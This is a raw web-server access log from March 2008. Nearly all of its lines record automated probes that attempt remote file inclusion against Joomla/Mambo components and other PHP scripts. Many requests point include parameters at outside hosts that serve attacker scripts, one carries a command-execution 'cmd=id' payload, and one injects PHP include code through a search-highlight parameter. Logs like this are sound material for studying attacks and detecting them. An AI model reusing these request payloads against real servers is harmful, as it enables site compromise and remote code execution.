219.94.129.206 - - [23/Mar/2008:17:45:32 -0700] "GET /logs//use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.94.129.206 - - [23/Mar/2008:17:45:33 -0700] "GET //use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
195.137.139.73 - - [23/Mar/2008:17:45:50 -0700] "GET /logs/error_log.20080113/index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
195.137.139.73 - - [23/Mar/2008:17:45:50 -0700] "GET /logs/index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
213.247.44.96 - - [23/Mar/2008:17:46:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
213.247.44.96 - - [23/Mar/2008:17:46:53 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
58.65.239.170 - - [23/Mar/2008:17:46:59 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 417792 "-" "-"
202.29.32.2 - - [23/Mar/2008:17:48:13 -0700] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.29.32.2 - - [23/Mar/2008:17:48:14 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 286 "-" "libwww-perl/5.805"
85.234.144.44 - - [23/Mar/2008:17:48:46 -0700] "GET /logs/access_log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
85.234.144.44 - - [23/Mar/2008:17:48:46 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.808"
85.234.144.44 - - [23/Mar/2008:17:48:46 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 6081 "-" "libwww-perl/5.808"
85.234.144.44 - - [23/Mar/2008:17:49:03 -0700] "GET /logs/error_log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.808"
85.17.150.2 - - [23/Mar/2008:17:49:43 -0700] "GET /logs/access_log.20080120/index.php?_REQUEST=&_REQUEST[option]=com_simpleboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
85.17.150.2 - - [23/Mar/2008:17:49:44 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_simpleboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
85.17.150.2 - - [23/Mar/2008:17:49:44 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_simpleboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
85.25.137.24 - - [23/Mar/2008:17:50:20 -0700] "GET /logs/access_log/index2.php?ID=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:17:50:21 -0700] "GET /index2.php?ID=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:17:50:21 -0700] "GET /logs/index2.php?ID=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
64.38.4.3 - - [23/Mar/2008:17:51:33 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/xxx.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.808"
87.230.15.10 - - [23/Mar/2008:17:54:12 -0700] "GET /logs/access_log/index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:17:54:12 -0700] "GET /index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:17:54:13 -0700] "GET /logs/index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
208.186.169.183 - - [23/Mar/2008:17:56:02 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.186.169.183 - - [23/Mar/2008:17:56:02 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.150.2 - - [23/Mar/2008:17:58:52 -0700] "GET /logs/access_log.20080127/index.php?_REQUEST=&_REQUEST[option]=com_simpleboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
85.25.137.24 - - [23/Mar/2008:17:59:15 -0700] "GET /logs/error_log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:17:59:15 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:17:59:15 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:18:00:32 -0700] "GET /logs/main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:18:00:32 -0700] "GET /main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:18:00:59 -0700] "GET /logs/access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
67.212.173.42 - - [23/Mar/2008:18:00:59 -0700] "GET //ashnews.php?pathtoashnews=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
67.212.173.42 - - [23/Mar/2008:18:01:00 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
195.137.139.73 - - [23/Mar/2008:18:01:02 -0700] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
67.212.173.42 - - [23/Mar/2008:18:02:32 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
195.137.139.73 - - [23/Mar/2008:18:02:57 -0700] "GET /index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
194.126.239.14 - - [23/Mar/2008:18:04:56 -0700] "GET /logs/access_log.20080127/scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
194.126.239.14 - - [23/Mar/2008:18:04:57 -0700] "GET /scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
194.126.239.14 - - [23/Mar/2008:18:04:57 -0700] "GET /logs/scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
213.193.222.218 - - [23/Mar/2008:18:05:58 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.193.222.218 - - [23/Mar/2008:18:05:58 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
158.110.147.192 - - [23/Mar/2008:18:06:22 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
158.110.147.192 - - [23/Mar/2008:18:06:22 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
213.193.222.218 - - [23/Mar/2008:18:06:42 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.193.222.218 - - [23/Mar/2008:18:06:42 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
194.126.239.14 - - [23/Mar/2008:18:06:44 -0700] "GET /scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
208.186.169.183 - - [23/Mar/2008:18:07:22 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 698 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.186.169.183 - - [23/Mar/2008:18:07:22 -0700] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 6086 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
58.65.239.170 - - [23/Mar/2008:18:07:26 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 843776 "-" "-"
116.12.48.135 - - [23/Mar/2008:18:07:27 -0700] "GET //use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/t.txt??? HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
116.12.48.135 - - [23/Mar/2008:18:07:27 -0700] "GET /logs//use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/t.txt??? HTTP/1.1" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
116.12.48.135 - - [23/Mar/2008:18:07:27 -0700] "GET //use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
116.12.48.135 - - [23/Mar/2008:18:07:27 -0700] "GET /logs//use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
212.102.0.104 - - [23/Mar/2008:18:07:58 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
212.102.0.104 - - [23/Mar/2008:18:07:58 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.25.137.24 - - [23/Mar/2008:18:08:10 -0700] "GET /logs/access_log.20080113/main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
87.117.225.155 - - [23/Mar/2008:18:08:11 -0700] "GET /logs/access_log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:08:11 -0700] "GET /logs/access_log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:08:11 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:08:11 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:08:11 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:08:11 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
64.38.4.3 - - [23/Mar/2008:18:08:17 -0700] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/xxx.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.808"
64.38.4.3 - - [23/Mar/2008:18:08:17 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/xxx.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.808"
194.126.239.14 - - [23/Mar/2008:18:08:29 -0700] "GET /logs/error_log.20080217/scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
195.137.139.73 - - [23/Mar/2008:18:08:46 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
190.54.28.163 - - [23/Mar/2008:18:12:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
190.54.28.163 - - [23/Mar/2008:18:12:33 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
85.25.137.24 - - [23/Mar/2008:18:13:02 -0700] "GET /logs/access_log.20080203/main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
202.29.32.2 - - [23/Mar/2008:18:13:12 -0700] "GET /logs/error_log.20080224/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 305 "-" "libwww-perl/5.805"
67.212.173.42 - - [23/Mar/2008:18:14:02 -0700] "GET /logs/error_log//newspublish/include.php?path%5Bdocroot%5D=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
67.212.173.42 - - [23/Mar/2008:18:14:02 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
210.21.49.49 - - [23/Mar/2008:18:14:08 -0700] "GET /logs/error_log.20080113/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
67.212.173.42 - - [23/Mar/2008:18:15:28 -0700] "GET /logs/access_log//newspublish/include.php?path%5Bdocroot%5D=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
64.38.4.3 - - [23/Mar/2008:18:15:51 -0700] "GET /logs/error_log.20080224/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/xxx.txt? HTTP/1.1" 404 292 "-" "libwww-perl/5.808"
211.115.217.162 - - [23/Mar/2008:18:16:28 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.jef.at/vnc/MIC22.txt????? HTTP/1.1" 404 236 "-" "libwww-perl/5.63"
211.115.217.162 - - [23/Mar/2008:18:16:28 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.jef.at/vnc/MIC22.txt????? HTTP/1.1" 404 231 "-" "libwww-perl/5.63"
72.52.195.135 - - [23/Mar/2008:18:16:35 -0700] "GET /index2.php?option=com_content&do_pdf=&id=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 228 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
72.52.195.135 - - [23/Mar/2008:18:16:35 -0700] "GET /logs/index2.php?option=com_content&do_pdf=&id=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
87.118.102.153 - - [23/Mar/2008:18:16:38 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
87.118.102.153 - - [23/Mar/2008:18:16:38 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
210.21.49.49 - - [23/Mar/2008:18:17:16 -0700] "GET /logs/access_log.20080113/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.65"
74.95.82.113 - - [23/Mar/2008:18:18:37 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 227 "-" "Advanced Browser (http://www.avantbrowser.com)"
74.95.82.113 - - [23/Mar/2008:18:18:37 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
194.187.213.53 - - [23/Mar/2008:18:20:26 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 200 698 "-" "libwww-perl/5.805"
203.22.204.188 - - [23/Mar/2008:18:22:19 -0700] "GET /logs/access_log.20080120//login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
203.22.204.188 - - [23/Mar/2008:18:22:19 -0700] "GET //login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
203.22.204.188 - - [23/Mar/2008:18:22:19 -0700] "GET /logs//login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
203.22.204.188 - - [23/Mar/2008:18:22:51 -0700] "GET /logs/access_log.20080113//login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:23:03 -0700] "GET /logs/access_log.20080203/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:23:03 -0700] "GET /logs/access_log.20080203/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:18:23:40 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:24:09 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
66.249.67.65 - - [23/Mar/2008:18:24:24 -0700] "GET /robots.txt HTTP/1.1" 404 216 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.65 - - [23/Mar/2008:18:24:24 -0700] "GET /urchin/index.cgi?top HTTP/1.1" 200 767 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.22.204.188 - - [23/Mar/2008:18:26:15 -0700] "GET //login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
58.65.239.170 - - [23/Mar/2008:18:27:30 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 786432 "-" "-"
72.36.208.178 - - [23/Mar/2008:18:30:39 -0700] "GET /logs/access_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:18:30:39 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:18:30:39 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:18:30:54 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
213.193.222.218 - - [23/Mar/2008:18:32:04 -0700] "GET /logs/about.php?inc_dir=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.193.222.218 - - [23/Mar/2008:18:32:04 -0700] "GET /about.php?inc_dir=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
72.36.208.178 - - [23/Mar/2008:18:32:19 -0700] "GET /logs/error_log.20080217/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:33:46 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:18:35:59 -0700] "GET /logs/access_log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:18:35:59 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:35:59 -0700] "GET /logs/access_log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:35:59 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
202.12.29.5 - - [23/Mar/2008:18:36:39 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://CMD/r7?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
189.20.228.26 - - [23/Mar/2008:18:40:17 -0700] "GET /logs/include/write.php?dir=http://www.arquivosweb.tecnologia.ws/cmd.gif?&cmd=id HTTP/1.1" 404 228 "-" "Mozilla/3.0 (compatible; Indy Library)"
160.99.12.231 - - [23/Mar/2008:18:40:21 -0700] "GET /logs/access_log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
